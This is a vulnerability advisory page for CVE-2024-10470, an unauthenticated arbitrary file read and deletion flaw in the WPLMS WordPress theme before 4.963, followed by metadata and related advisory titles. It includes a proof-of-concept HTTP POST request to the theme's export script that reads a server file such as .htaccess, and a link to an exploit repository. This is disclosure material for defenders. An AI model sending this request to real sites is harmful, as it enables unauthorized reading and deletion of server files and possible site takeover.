WPLMS Learning Management System for WordPress < 4.963 – Unauthenticated Arbitrary File Read and Deletion | CVE 2024-10470 | Theme Vulnerabilities

Description

The theme is vulnerable to arbitrary file read and deletion due to insufficient file path validation and permissions checks in the readfile and unlink functions. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). The theme is vulnerable even when it is not activated.

Proof of Concept

https://github.com/RandomRobbieBF/CVE-2024-10470

POST /wp-content/themes/wplms/setup/installer/envato-setup-export.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

download_export_zip=1&zip_file=.htaccess

Affects Themes

Fixed in 4.963

References

CVE

URL

https://www.wordfence.com/threat-intel/vulnerabilities/id/1932c9b4-2fea-40f8-9748-09ded8143c11

Classification

Type

LFI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Foxyyy

Verified

Yes

WPVDB ID

fa4da6fd-87e2-4283-95fc-9b4a67db41b5

Timeline

Publicly Published

2024-11-08 (about 1 year ago)

Added

2024-11-08 (about 1 year ago)

Last Updated

2024-11-14 (about 1 year ago)

Other

Published

Title

Published

2026-02-25

Title

WP Responsive Images <= 1.0 - Unauthenticated Path Traversal to Arbitrary File Read via src

Published

2015-08-28

Title

NextGEN Gallery < 2.1.9 - Authenticated Path Traversal

Published

2025-08-28

Title

Slider Revolution < 6.7.37 - Authenticated (Contributor+) Arbitrary File Read via 'used_svg' and 'used_images'

Published

2023-10-11

Title

Icegram Express < 5.6.24 - Admin+ Directory Traversal

Published

2025-02-21

Title

Theme File Duplicator <= 1.3 - Authenticated (Subscriber+) Arbitrary File Download